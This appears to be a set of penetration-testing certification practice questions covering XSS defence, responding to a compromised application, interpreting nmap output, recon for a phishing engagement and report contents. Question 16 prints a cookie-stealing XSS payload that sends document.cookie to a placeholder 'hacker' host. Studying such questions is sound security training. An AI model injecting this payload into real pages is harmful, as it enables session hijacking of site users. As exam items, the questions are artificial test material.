Question 16

Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
  • Question 17

    Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
  • Question 18

    A penetration tester runs a scan against a server and obtains the following output:
    21/tcp open ftp Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | 03-12-20 09:23AM 331 index.aspx
    | ftp-syst:
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
    3389/tcp open ssl/ms-wbt-server
    | rdp-ntlm-info:
    | Target Name: WEB3
    | NetBIOS_Computer_Name: WEB3
    | Product_Version: 6.3.9600
    |_ System_Time: 2021-01-15T11:32:06+00:00
    8443/tcp open http Microsoft IIS httpd 8.5
    | http-methods:
    |_ Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/8.5
    |_http-title: IIS Windows Server
    Which of the following command sequences should the penetration tester try NEXT?
  • Question 19

    During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools? (Choose two.)
  • Question 20

    Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)